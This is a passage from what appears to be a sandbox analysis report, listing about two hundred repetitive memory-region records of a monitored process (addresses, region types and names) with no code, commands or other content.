= "" Region: id = 3926 start_va = 0x10e60000 end_va = 0x10edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010e60000" filename = "" Region: id = 3927 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3928 start_va = 0x520000 end_va = 0x52efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 3929 start_va = 0x520000 end_va = 0x52efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 3930 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3931 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3932 start_va = 0x520000 end_va = 0x52efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 3933 start_va = 0x520000 end_va = 0x52efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 3934 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3935 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3936 start_va = 0x520000 end_va = 0x52efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 3937 start_va = 0x520000 end_va = 0x52efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 3938 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3939 start_va = 0x10ee0000 end_va = 0x10f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010ee0000" filename = "" Region: id = 3940 start_va = 0x10f60000 end_va = 0x10fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010f60000" filename = "" Region: id = 3941 start_va = 0x10fe0000 end_va = 0x1105ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010fe0000" filename = "" Region: id = 3942 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3943 start_va = 0x520000 end_va = 0x52efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 3944 start_va = 0x520000 end_va = 0x52efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 3945 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3946 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3947 start_va = 0x520000 end_va = 0x52efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 3948 start_va = 0x520000 end_va = 0x52efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 3949 start_va = 0x520000 end_va = 0x52efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 3950 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3951 start_va = 0x520000 end_va = 0x526fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3952 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3953 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3954 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3955 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3956 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3957 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3958 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3959 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3960 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3961 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3962 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3963 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3964 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3965 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3966 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3967 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3968 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3969 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3970 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3971 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3972 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3973 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3974 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3975 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3976 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3977 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3978 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3979 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3980 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3981 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3982 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3983 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3984 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3985 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3986 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3987 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3988 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3989 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3990 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3991 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3992 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3993 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3994 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3995 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3996 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 3997 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3998 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3999 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4000 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4001 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4002 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4003 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4004 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4005 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4006 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4007 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4008 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4009 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4010 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4011 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4012 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4013 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4014 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4015 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4016 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4017 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4018 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4019 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4020 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4021 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4022 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4023 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4024 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4025 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4026 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4027 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4028 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4029 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4030 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4031 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4032 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4033 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4034 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4035 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4036 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4037 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4038 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4039 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4040 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4041 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4042 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4043 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4044 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4045 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4046 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4047 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4048 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4049 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4050 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4051 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4052 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4053 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4054 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4055 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4056 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4057 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4058 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4059 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4060 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4061 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4062 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4063 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4064 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4065 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4066 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4067 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4068 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4069 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4070 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4071 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4072 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4073 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4074 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4075 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4076 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4077 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4078 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4079 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4080 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4081 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4082 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4083 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4084 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4085 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4086 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4087 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4088 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4089 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4090 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4091 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4092 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4093 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4094 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4095 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4096 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4097 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4098 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4099 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4100 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4101 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4102 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4103 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4104 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4105 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4106 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4107 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4108 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4109 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4110 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4111 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4112 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4113 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4114 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4115 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4116 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4117 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4118 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4119 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4120 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4121 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4122 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4123 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4124 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4125 start_va = 0x400000 end_va = 